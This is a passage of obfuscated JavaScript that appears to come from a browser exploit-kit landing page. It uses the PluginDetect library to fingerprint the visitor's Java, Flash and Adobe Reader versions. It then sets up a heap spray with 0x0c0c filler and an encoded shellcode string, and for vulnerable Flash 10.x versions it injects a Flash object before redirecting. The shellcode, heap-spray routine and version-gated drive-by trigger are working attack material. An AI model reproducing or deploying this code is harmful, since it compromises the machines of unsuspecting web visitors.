} } catch (h){ } } } , insert_Query_Any : function (){ var d = this , i = d.$, e = d.$$, l = d.results, p = d.HTML, a = "    ", g = "A.class", m = i.file.getValid(e); if (!m){ return d.getResult() } if (e.OTF < 1){ e.OTF = 1 } if (d.allDisabled()){ return d.getResult() } if (e.OTF < 1.5){ e.OTF = 1.5 } var j = m.name + m.ext, h = m.path; var f = ["archive", j, "code", g], c = ["mayscript", "true"], o = [ "scriptable", "true"].concat(c), n = e.navigator, b =! i.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : e.mimeType[0]; if (d.should_Insert_Query(0)){ if (e.OTF < 2){ e.OTF = 2 } ; p[0] = i.isIE ? i.insertHTML("object", ["type", b], ["codebase", h].concat(f ).concat(o), a, e) : i.insertHTML("object", ["type", b], ["codebase", h]. concat(f).concat(o), a, e); l[0] = [0, 0]; d.query(0) } if (d.should_Insert_Query(1)){ if (e.OTF < 2){ e.OTF = 2 } ; p[1] = i.isIE ? i.insertHTML("applet", ["alt", a].concat(c).concat(f), [ "codebase", h].concat(c), a, e) : i.insertHTML("applet", ["codebase", h, "alt", a].concat(c).concat(f), [].concat(c), a, e); l[1] = [0, 0]; d.query(1) } if (d.should_Insert_Query(2)){ if (e.OTF < 2){ e.OTF = 2 } ; p[2] = i.isIE ? i.insertHTML("object", ["classid", e.classID], ["codebase", h].concat(f).concat(o), a, e) : i.insertHTML(); l[2] = [0, 0]; d.query(2) } if (!d.DummyObjTagHTML &&! e.isDisabled.ObjectTag()){ d.DummyObjTagHTML = i.insertHTML("object", [], [], a) } if (!d.DummySpanTagHTML){ d.DummySpanTagHTML = i.insertHTML("", [], [], a) } ; var k = e.NOTF; if (e.OTF < 3 && k.shouldContinueQuery()){ e.OTF = 3; k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k); if (!i.winLoaded){ i.WLfuncs0.push([k.winOnLoadQuery, k]) } setTimeout(k.onIntervalQuery, k.intervalLength) } ; return d.getResult() } } , NOTF : { $ : 1, count : 0, countMax : 25, intervalLength : 250, shouldContinueQuery : function (){ var e = this , d = e.$, c = e.$$, b = c.applet, a; for (a = 0; a < b.results.length; a ++ ){ if (b.HTML[a] &&! b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1 &&! b.getResult()[0])) && e.isAppletActive(a) >= 0){ return 1 } } return 0 } , isJavaActive : function (d){ var f = this , c = f.$$, a, b, e =- 9; for (a = 0; a < c.applet.HTML.length; a ++ ){ b = f.isAppletActive(a, d); if (b > e){ e = b } } return e } , isAppletActive : function (c, a){ var d = this , b = d.$$.applet.active; if (!a){ b[c] = d.isAppletActive_(c) } return b[c] } , isAppletActive_ : function (d){ var g = this , f = g.$, b = g.$$, l = b.navigator, a = b.applet, h = a.HTML[d] , i, k, c = 0, j = f.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g. count); if (j ==- 2){ return - 2 } try { if (f.isIE && f.verIE >= b.minIEver && f.getDOMobj(h).object){ return 1 } } catch (i){ } for (k = 0; k < a.active.length; k ++ ){ if (a.active[k] > 0){ c = 1 } } if (j == 1 && (f.isIE || ((b.version0 && l.javaEnabled() && l.mimeObj && (h. tagName == "object" || c)) || b.lang.System.getProperty()[0]))){ return 1 } if (j < 0){ return - 1 } return 0 } , winOnLoadQuery : function (c, d){ var b = d.$$, a; if (b.OTF == 3){ a = d.queryAllApplets(); d.queryCompleted(a[1], a[2]) } } , $$onIntervalQuery : function (d){ var c = d.$, b = d.$$, a; if (b.OTF == 3){ a = d.queryAllApplets(); if (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)){ d.queryCompleted(a[1], a[2]) } } d.count++; if (b.OTF == 3){ setTimeout(d.onIntervalQuery, d.intervalLength) } } , queryAllApplets : function (){ var g = this , f = g.$, e = g.$$, d = e.applet, b, a, c; for (b = 0; b < d.results.length; b ++ ){ d.query(b) } a = d.getResult(); c = a[0] ? true : false; return [c, a[0], a[1]] } , queryCompleted : function (c, f){ var e = this , d = e.$, b = e.$$; if (b.OTF >= 4){ return } b.OTF = 4; var a = e.isJavaActive(); b.setPluginStatus(c, f, 0); if (b.funcs){ d.callArray(b.funcs) } if (d.onDoneEmptyDiv){ d.onDoneEmptyDiv() } } } , zz : 0 } , flash : { mimeType : "application/x-shockwave-flash", progID : "ShockwaveFlash.ShockwaveFlash", classID : "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000", getVersion : function (){ var b = function (i){ if (!i){ return null } var e =/ [ \ d][ \ d \,\ . \ s] * [rRdD]{ 0, 1 } [ \ d \, ] */ .exec(i); return e ? e[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null } ; var j = this , g = j.$, k, h, l = null, c = null, a = null, f, m, d; if (!g.isIE){ m = g.hasMimeType(j.mimeType); if (m){ f = g.getDOMobj(g.insertHTML("object", ["type", j.mimeType], [], "", j)); try { l = g.getNum(f.GetVariable("$version")) } catch (k){ } } if (!l){ d = m ? m.enabledPlugin : null; if (d && d.description){ l = b(d.description) } if (l){ l = g.getPluginFileVersion(d, l) } } } else { for (h = 15; h > 2; h -- ){ c = g.getAXO(j.progID + "." + h); if (c){ a = h.toString(); break } } if (!c){ c = g.getAXO(j.progID) } if (a == "6"){ try { c.AllowScriptAccess = "always" } catch (k){ return "6,0,21,0" } } try { l = b(c.GetVariable("$version")) } catch (k){ } if (!l && a){ l = a } } j.installed = l ? 1 :- 1; j.version = g.formatNum(l); return true } } , adobereader : { mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF", "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED : { } , pluginHasMimeType : function (d, c, f){ var b = this , e = b.$, a; for (ain d){ if (d[a] && d[a].type && d[a].type == c){ return 1 } } if (e.getMimeEnabledPlugin(c, f)){ return 1 } return 0 } , getVersion : function (l, j){ var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c; if (d.isString(j)){ j = j.replace(/\s/g, ""); if (j){ k = j } } else { j = null } if (d.isDefined(g.INSTALLED[k])){ g.installed = g.INSTALLED[k]; return } if (!d.isIE){ a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in"; if (g.getVersionDone !== 0){ g.getVersionDone = 0; b = d.getMimeEnabledPlugin(g.mimeType, a); if (!j){ n = b } if (!b && d.hasMimeType(g.mimeType)){ b = d.findNavPlugin(a, 0) } if (b){ g.navPluginObj = b; h = d.getNum(b.description) || d.getNum(b.name); h = d.getPluginFileVersion(b, h); if (!h && d.OS == 1){ if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){ h = "9" } else { if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){ h = "8" } } } } } else { h = g.version } if (!d.isDefined(n)){ n = d.getMimeEnabledPlugin(k, a) } g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1)) } else { b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]); c =/=\ s * ([ \ d \ .] + ) / g; try { f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions(); for (m = 0; m < 5; m ++ ){ if (c.test(f) && (!h || RegExp.$1 > h)){ h = RegExp.$1 } } } catch (i){ } g.installed = h ? 1 : (b ? 0 :- 1) } if (!g.version){ g.version = d.formatNum(h) } g.INSTALLED[k] = g.installed } } , zz : 0 } } ; PluginDetect.initScript(); PluginDetect.getVersion("."); pdfver = PluginDetect.getVersion("AdobeReader"); flashver = PluginDetect.getVersion('Flash'); javaver = PluginDetect.getVersion('Java', 'getJavaInfo.jar'); } catch (e){ } if (typeof pdfver == 'string'){ pdfver = pdfver.split('.') } else { pdfver = [0, 0, 0, 0] } if (typeof flashver == 'string'){ flashver = flashver.split('.') } else { flashver = [0, 0, 0, 0] } if (typeof javaver == 'string'){ javaver = javaver.split('.') } else { javaver = [0, 0, 0, 0] } function spl0(){ spl2() } function spl2(){ spl3() } function spl3(){ spl4() } function spl4(){ setTimeout(spl5, 1000) } function getCN(){ return 'data/score.swf' } function getBlockSize(){ return 1024 } function getAllocSize(){ return 1024 * 1024 } function getAllocCount(){ return 300 } function getFillBytes(){ var a = '%u' + '0c0c'; return a + a; } function getShellCode(){ if (1){ return " %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830%ue240%uebfa%ue805%uffeb %uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476 %u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3 %u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896 %uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4 %u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be %ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828 %uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e %u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f %u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1 %u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35 %u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b %u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0 %ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c %u1258%u0707%u4d4e%u5c5b%u5b47%u4341%u4449%u5a06%u075d%u065f%u4058%u1758%u154e%u4e4b%u1b1a %u0e1c%u154d%u2819%u0028"; } } function spl5(){ var ver1 = flashver[0]; var ver2 = flashver[1]; var ver3 = flashver[2]; if (((ver1 == 10 && ver2 == 0 && ver3 > 40) || ((ver1 == 10 && ver2 > 0) && (ver1 == 10 && ver2 < 2))) || ((ver1 == 10 && ver2 == 2 && ver3 < 159) || (ver1 == (11 - 1) && ver2 < 2))){ var fname = "data/field"; var Flash_obj = " "; Flash_obj += ""; al = "always"; Flash_obj += ""; Flash_obj += ""; Flash_obj += ""; Flash_obj += ""; Flash_obj += ""; Flash_obj += ""; var oSpan = document.createElement("span"); document.body.appendChild(oSpan); oSpan.innerHTML = Flash_obj; } spl7(); } function spl7(){ setTimeout(end_redirect, 8000); } spl0();